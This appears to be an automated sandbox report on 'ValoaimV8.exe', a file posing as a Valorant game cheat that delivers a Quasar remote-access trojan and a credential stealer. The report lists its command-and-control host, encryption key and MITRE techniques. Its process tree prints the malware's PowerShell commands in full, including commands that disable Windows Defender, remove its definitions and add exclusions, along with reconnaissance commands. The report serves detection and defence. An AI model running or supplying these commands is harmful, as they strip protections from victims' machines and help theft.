quasar | 193d9acadf1f7cb18bd295f774c644f34da72dbc10c2eccd39c858f55f320a2f

Resubmissions

27/09/2024, 01:12

240927-bkt8wazfqa 10

27/09/2024, 01:12

240927-bkkz7szfng 10

25/09/2024, 17:23

240925-vx4smaxdmn 10

Analysis

max time kernel
30s
max time network
32s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
27/09/2024, 01:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ValoaimV8.exe
Size

20.0MB
MD5

4ed9006d9970ee5f1ee6486cfc663ee6
SHA1

258fbba6e43c23ad9680576cc51a7c0906387354
SHA256

443be4b5119ad344755137062321a4f5c249e8fb95482183c21378ba93fd96bf
SHA512

952750f7e1a1182ed69ef837b0ea053a66ef1f65d8a534a2a445a660677fc19f2eca6aa66e25e6bafedd94bbf9ccd99e3feea63b0bbd8a36d8683f67c2c63daa
SSDEEP

98304:zrcxzdbM+Q2y+aq0mGRk2jOjFgFQlwq4Mjk+dBZtu9xTtwz/aer6/BbQEJ1nL2hS:zrcbf0mPEOjmFQR4MVGFtwLPCnL2hVcr

Score

10^/10

quasar valorant collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Extracted

Family

quasar

Version

1.3.0.0

Botnet

Valorant

hanekese.ddns.net:1005

Mutex

QSR_MUTEX_vjIusnIFPVRxcR2xS4

Attributes

encryption_key
5V49FWeqLdk5NQWJl6h7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
mac updater
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000800000002349b-87.dat	family_quasar
behavioral2/memory/2552-117-0x0000000000DA0000-0x0000000000DFE000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1664	powershell.exe
548	powershell.exe
4356	powershell.exe
3048	powershell.exe
1244	powershell.exe
4048	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	bound.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation	bound.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
864	cmd.exe
1896	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2552	bound.exe
2332	rar.exe
1204	bound.exe
4640	bound.exe

Loads dropped DLL 17 IoCs

pid	Process
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe
1092	ValoaimV8.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
29	discord.com
28	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
16	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3056	tasklist.exe
2248	tasklist.exe
1844	tasklist.exe
5028	tasklist.exe

UPX packed file 62 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00070000000234b4-22.dat	upx
behavioral2/memory/1092-26-0x00007FFCA46D0000-0x00007FFCA4CB9000-memory.dmp	upx
behavioral2/files/0x00070000000234a6-29.dat	upx
behavioral2/memory/1092-31-0x00007FFCB89B0000-0x00007FFCB89D3000-memory.dmp	upx
behavioral2/files/0x00070000000234b2-32.dat	upx
behavioral2/files/0x00070000000234b8-40.dat	upx
behavioral2/memory/1092-50-0x00007FFCBD200000-0x00007FFCBD20F000-memory.dmp	upx
behavioral2/files/0x00070000000234ad-49.dat	upx
behavioral2/files/0x00070000000234ac-48.dat	upx
behavioral2/files/0x00070000000234ab-47.dat	upx
behavioral2/files/0x00070000000234aa-46.dat	upx
behavioral2/files/0x00070000000234a9-45.dat	upx
behavioral2/files/0x00070000000234a8-44.dat	upx
behavioral2/files/0x00070000000234a7-43.dat	upx
behavioral2/files/0x00070000000234a5-42.dat	upx
behavioral2/files/0x00070000000234b9-41.dat	upx
behavioral2/files/0x00070000000234b7-39.dat	upx
behavioral2/files/0x00070000000234b3-36.dat	upx
behavioral2/files/0x00070000000234b1-35.dat	upx
behavioral2/memory/1092-56-0x00007FFCB38E0000-0x00007FFCB390D000-memory.dmp	upx
behavioral2/memory/1092-62-0x00007FFCB2F80000-0x00007FFCB30F0000-memory.dmp	upx
behavioral2/memory/1092-60-0x00007FFCB38B0000-0x00007FFCB38D3000-memory.dmp	upx
behavioral2/memory/1092-58-0x00007FFCB9BD0000-0x00007FFCB9BE9000-memory.dmp	upx
behavioral2/memory/1092-66-0x00007FFCB7B00000-0x00007FFCB7B0D000-memory.dmp	upx
behavioral2/memory/1092-64-0x00007FFCB3890000-0x00007FFCB38A9000-memory.dmp	upx
behavioral2/memory/1092-68-0x00007FFCB3860000-0x00007FFCB388E000-memory.dmp	upx
behavioral2/memory/1092-78-0x00007FFCB3840000-0x00007FFCB3854000-memory.dmp	upx
behavioral2/memory/1092-85-0x00007FFCA3E30000-0x00007FFCA3F4C000-memory.dmp	upx
behavioral2/memory/1092-84-0x00007FFCB9BD0000-0x00007FFCB9BE9000-memory.dmp	upx
behavioral2/memory/1092-81-0x00007FFCB3F20000-0x00007FFCB3F2D000-memory.dmp	upx
behavioral2/memory/1092-80-0x00007FFCB38E0000-0x00007FFCB390D000-memory.dmp	upx
behavioral2/memory/1092-76-0x00007FFCB89B0000-0x00007FFCB89D3000-memory.dmp	upx
behavioral2/memory/1092-75-0x00007FFCA3F50000-0x00007FFCA42C9000-memory.dmp	upx
behavioral2/memory/1092-73-0x00007FFCB2C80000-0x00007FFCB2D38000-memory.dmp	upx
behavioral2/memory/1092-72-0x00007FFCA46D0000-0x00007FFCA4CB9000-memory.dmp	upx
behavioral2/memory/1092-120-0x00007FFCB38B0000-0x00007FFCB38D3000-memory.dmp	upx
behavioral2/memory/1092-143-0x00007FFCB2F80000-0x00007FFCB30F0000-memory.dmp	upx
behavioral2/memory/1092-210-0x00007FFCB3890000-0x00007FFCB38A9000-memory.dmp	upx
behavioral2/memory/1092-254-0x00007FFCB7B00000-0x00007FFCB7B0D000-memory.dmp	upx
behavioral2/memory/1092-292-0x00007FFCB3860000-0x00007FFCB388E000-memory.dmp	upx
behavioral2/memory/1092-295-0x00007FFCB2C80000-0x00007FFCB2D38000-memory.dmp	upx
behavioral2/memory/1092-308-0x00007FFCA3F50000-0x00007FFCA42C9000-memory.dmp	upx
behavioral2/memory/1092-330-0x00007FFCB89B0000-0x00007FFCB89D3000-memory.dmp	upx
behavioral2/memory/1092-335-0x00007FFCB2F80000-0x00007FFCB30F0000-memory.dmp	upx
behavioral2/memory/1092-329-0x00007FFCA46D0000-0x00007FFCA4CB9000-memory.dmp	upx
behavioral2/memory/1092-343-0x00007FFCA3E30000-0x00007FFCA3F4C000-memory.dmp	upx
behavioral2/memory/1092-348-0x00007FFCA46D0000-0x00007FFCA4CB9000-memory.dmp	upx
behavioral2/memory/1092-376-0x00007FFCB3F20000-0x00007FFCB3F2D000-memory.dmp	upx
behavioral2/memory/1092-387-0x00007FFCB3860000-0x00007FFCB388E000-memory.dmp	upx
behavioral2/memory/1092-388-0x00007FFCB2C80000-0x00007FFCB2D38000-memory.dmp	upx
behavioral2/memory/1092-386-0x00007FFCB7B00000-0x00007FFCB7B0D000-memory.dmp	upx
behavioral2/memory/1092-385-0x00007FFCB3890000-0x00007FFCB38A9000-memory.dmp	upx
behavioral2/memory/1092-384-0x00007FFCB2F80000-0x00007FFCB30F0000-memory.dmp	upx
behavioral2/memory/1092-383-0x00007FFCB38B0000-0x00007FFCB38D3000-memory.dmp	upx
behavioral2/memory/1092-382-0x00007FFCB9BD0000-0x00007FFCB9BE9000-memory.dmp	upx
behavioral2/memory/1092-381-0x00007FFCB38E0000-0x00007FFCB390D000-memory.dmp	upx
behavioral2/memory/1092-380-0x00007FFCBD200000-0x00007FFCBD20F000-memory.dmp	upx
behavioral2/memory/1092-379-0x00007FFCB89B0000-0x00007FFCB89D3000-memory.dmp	upx
behavioral2/memory/1092-378-0x00007FFCA3F50000-0x00007FFCA42C9000-memory.dmp	upx
behavioral2/memory/1092-377-0x00007FFCA3E30000-0x00007FFCA3F4C000-memory.dmp	upx
behavioral2/memory/1092-375-0x00007FFCB3840000-0x00007FFCB3854000-memory.dmp	upx
behavioral2/memory/1092-363-0x00007FFCA46D0000-0x00007FFCA4CB9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Program crash 3 IoCs

pid	pid_target	Process	procid_target
400	2552	WerFault.exe	100
3580	1204	WerFault.exe	199
2868	4640	WerFault.exe	206

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2380	PING.EXE
3060	PING.EXE
4212	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3904	cmd.exe
1592	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1064	WMIC.exe
3960	WMIC.exe
4016	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4640	systeminfo.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
2380	PING.EXE
3060	PING.EXE
4212	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3048	powershell.exe
1664	powershell.exe
548	powershell.exe
548	powershell.exe
1664	powershell.exe
1664	powershell.exe
3048	powershell.exe
3048	powershell.exe
548	powershell.exe
4356	powershell.exe
4356	powershell.exe
1896	powershell.exe
1896	powershell.exe
1896	powershell.exe
656	powershell.exe
656	powershell.exe
656	powershell.exe
1244	powershell.exe
1244	powershell.exe
2592	powershell.exe
2592	powershell.exe
4048	powershell.exe
4048	powershell.exe
2484	powershell.exe
2484	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	540	WMIC.exe
Token: SeSecurityPrivilege	540	WMIC.exe
Token: SeTakeOwnershipPrivilege	540	WMIC.exe
Token: SeLoadDriverPrivilege	540	WMIC.exe
Token: SeSystemProfilePrivilege	540	WMIC.exe
Token: SeSystemtimePrivilege	540	WMIC.exe
Token: SeProfSingleProcessPrivilege	540	WMIC.exe
Token: SeIncBasePriorityPrivilege	540	WMIC.exe
Token: SeCreatePagefilePrivilege	540	WMIC.exe
Token: SeBackupPrivilege	540	WMIC.exe
Token: SeRestorePrivilege	540	WMIC.exe
Token: SeShutdownPrivilege	540	WMIC.exe
Token: SeDebugPrivilege	540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	540	WMIC.exe
Token: SeRemoteShutdownPrivilege	540	WMIC.exe
Token: SeUndockPrivilege	540	WMIC.exe
Token: SeManageVolumePrivilege	540	WMIC.exe
Token: 33	540	WMIC.exe
Token: 34	540	WMIC.exe
Token: 35	540	WMIC.exe
Token: 36	540	WMIC.exe
Token: SeDebugPrivilege	1844	tasklist.exe
Token: SeDebugPrivilege	3048	powershell.exe
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	548	powershell.exe
Token: SeIncreaseQuotaPrivilege	540	WMIC.exe
Token: SeSecurityPrivilege	540	WMIC.exe
Token: SeTakeOwnershipPrivilege	540	WMIC.exe
Token: SeLoadDriverPrivilege	540	WMIC.exe
Token: SeSystemProfilePrivilege	540	WMIC.exe
Token: SeSystemtimePrivilege	540	WMIC.exe
Token: SeProfSingleProcessPrivilege	540	WMIC.exe
Token: SeIncBasePriorityPrivilege	540	WMIC.exe
Token: SeCreatePagefilePrivilege	540	WMIC.exe
Token: SeBackupPrivilege	540	WMIC.exe
Token: SeRestorePrivilege	540	WMIC.exe
Token: SeShutdownPrivilege	540	WMIC.exe
Token: SeDebugPrivilege	540	WMIC.exe
Token: SeSystemEnvironmentPrivilege	540	WMIC.exe
Token: SeRemoteShutdownPrivilege	540	WMIC.exe
Token: SeUndockPrivilege	540	WMIC.exe
Token: SeManageVolumePrivilege	540	WMIC.exe
Token: 33	540	WMIC.exe
Token: 34	540	WMIC.exe
Token: 35	540	WMIC.exe
Token: 36	540	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1064	WMIC.exe
Token: SeSecurityPrivilege	1064	WMIC.exe
Token: SeTakeOwnershipPrivilege	1064	WMIC.exe
Token: SeLoadDriverPrivilege	1064	WMIC.exe
Token: SeSystemProfilePrivilege	1064	WMIC.exe
Token: SeSystemtimePrivilege	1064	WMIC.exe
Token: SeProfSingleProcessPrivilege	1064	WMIC.exe
Token: SeIncBasePriorityPrivilege	1064	WMIC.exe
Token: SeCreatePagefilePrivilege	1064	WMIC.exe
Token: SeBackupPrivilege	1064	WMIC.exe
Token: SeRestorePrivilege	1064	WMIC.exe
Token: SeShutdownPrivilege	1064	WMIC.exe
Token: SeDebugPrivilege	1064	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1064	WMIC.exe
Token: SeRemoteShutdownPrivilege	1064	WMIC.exe
Token: SeUndockPrivilege	1064	WMIC.exe
Token: SeManageVolumePrivilege	1064	WMIC.exe
Token: 33	1064	WMIC.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2552	bound.exe
1204	bound.exe
4640	bound.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 1092	4932	ValoaimV8.exe	82
PID 4932 wrote to memory of 1092	4932	ValoaimV8.exe	82
PID 1092 wrote to memory of 3676	1092	ValoaimV8.exe	83
PID 1092 wrote to memory of 3676	1092	ValoaimV8.exe	83
PID 1092 wrote to memory of 1148	1092	ValoaimV8.exe	85
PID 1092 wrote to memory of 1148	1092	ValoaimV8.exe	85
PID 1092 wrote to memory of 4820	1092	ValoaimV8.exe	86
PID 1092 wrote to memory of 4820	1092	ValoaimV8.exe	86
PID 1092 wrote to memory of 3640	1092	ValoaimV8.exe	87
PID 1092 wrote to memory of 3640	1092	ValoaimV8.exe	87
PID 1092 wrote to memory of 2256	1092	ValoaimV8.exe	141
PID 1092 wrote to memory of 2256	1092	ValoaimV8.exe	141
PID 1092 wrote to memory of 4768	1092	ValoaimV8.exe	93
PID 1092 wrote to memory of 4768	1092	ValoaimV8.exe	93
PID 1148 wrote to memory of 3048	1148	cmd.exe	95
PID 1148 wrote to memory of 3048	1148	cmd.exe	95
PID 4820 wrote to memory of 1664	4820	cmd.exe	96
PID 4820 wrote to memory of 1664	4820	cmd.exe	96
PID 3676 wrote to memory of 548	3676	cmd.exe	97
PID 3676 wrote to memory of 548	3676	cmd.exe	97
PID 2256 wrote to memory of 1844	2256	cmd.exe	98
PID 2256 wrote to memory of 1844	2256	cmd.exe	98
PID 4768 wrote to memory of 540	4768	cmd.exe	99
PID 4768 wrote to memory of 540	4768	cmd.exe	99
PID 3640 wrote to memory of 2552	3640	cmd.exe	100
PID 3640 wrote to memory of 2552	3640	cmd.exe	100
PID 3640 wrote to memory of 2552	3640	cmd.exe	100
PID 1092 wrote to memory of 2032	1092	ValoaimV8.exe	102
PID 1092 wrote to memory of 2032	1092	ValoaimV8.exe	102
PID 2032 wrote to memory of 2300	2032	cmd.exe	104
PID 2032 wrote to memory of 2300	2032	cmd.exe	104
PID 1092 wrote to memory of 2508	1092	ValoaimV8.exe	105
PID 1092 wrote to memory of 2508	1092	ValoaimV8.exe	105
PID 2508 wrote to memory of 116	2508	cmd.exe	107
PID 2508 wrote to memory of 116	2508	cmd.exe	107
PID 1092 wrote to memory of 2972	1092	ValoaimV8.exe	108
PID 1092 wrote to memory of 2972	1092	ValoaimV8.exe	108
PID 2972 wrote to memory of 1064	2972	cmd.exe	110
PID 2972 wrote to memory of 1064	2972	cmd.exe	110
PID 1092 wrote to memory of 1204	1092	ValoaimV8.exe	111
PID 1092 wrote to memory of 1204	1092	ValoaimV8.exe	111
PID 1204 wrote to memory of 3960	1204	cmd.exe	113
PID 1204 wrote to memory of 3960	1204	cmd.exe	113
PID 1092 wrote to memory of 3680	1092	ValoaimV8.exe	114
PID 1092 wrote to memory of 3680	1092	ValoaimV8.exe	114
PID 1092 wrote to memory of 2472	1092	ValoaimV8.exe	117
PID 1092 wrote to memory of 2472	1092	ValoaimV8.exe	117
PID 1092 wrote to memory of 516	1092	ValoaimV8.exe	118
PID 1092 wrote to memory of 516	1092	ValoaimV8.exe	118
PID 1092 wrote to memory of 1032	1092	ValoaimV8.exe	164
PID 1092 wrote to memory of 1032	1092	ValoaimV8.exe	164
PID 2472 wrote to memory of 5028	2472	cmd.exe	123
PID 2472 wrote to memory of 5028	2472	cmd.exe	123
PID 516 wrote to memory of 3056	516	cmd.exe	124
PID 516 wrote to memory of 3056	516	cmd.exe	124
PID 1032 wrote to memory of 3688	1032	cmd.exe	125
PID 1032 wrote to memory of 3688	1032	cmd.exe	125
PID 1092 wrote to memory of 864	1092	ValoaimV8.exe	172
PID 1092 wrote to memory of 864	1092	ValoaimV8.exe	172
PID 864 wrote to memory of 1896	864	cmd.exe	128
PID 864 wrote to memory of 1896	864	cmd.exe	128
PID 1092 wrote to memory of 2128	1092	ValoaimV8.exe	129
PID 1092 wrote to memory of 2128	1092	ValoaimV8.exe	129
PID 1092 wrote to memory of 2512	1092	ValoaimV8.exe	131

C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe
"C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4932
- C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe
  "C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ValoaimV8.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1148
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4820
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "start bound.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\bound.exe
      bound.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2552
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZVXe8EKMJlT9.bat" "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4264
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3704
      - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2380
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bound.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:1204
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Vpiy0o83ZDZG.bat" "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:348
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1760
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bound.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dejp7bh0e9yQ.bat" "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2628
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:3468
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4640 -s 2240
        9⤵
        Program crash
        
        PID:2868
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 2212
        7⤵
        Program crash
        
        PID:3580
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2552 -s 2200
        5⤵
        Program crash
        
        PID:400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:2300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2508
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2972
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'"
    3⤵
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4356
